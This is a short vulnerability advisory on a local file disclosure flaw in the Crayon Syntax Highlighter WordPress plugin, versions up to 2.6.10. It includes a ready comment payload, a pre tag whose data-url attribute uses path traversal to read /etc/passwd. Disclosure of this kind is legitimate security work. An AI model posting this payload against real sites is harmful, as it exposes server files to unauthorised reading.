Crayon Syntax Highlighter <= 2.6.10 - Local File Disclosure

2015-04-15T00:00:00
ID WPEX-ID:7904
Type wpexploit
Reporter Kevin Subileau
Modified 2019-10-21T00:00:00

Description

WordPress Vulnerability - Crayon Syntax Highlighter <= 2.6.10 - Local File Disclosure

                                        
                                            For example, just by posting a comment containing the following code on a website using this plugin, an attacker could see the content of /etc/password :
&lt;pre class="lang:php" data-url="/../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"&gt;&lt;/pre&gt;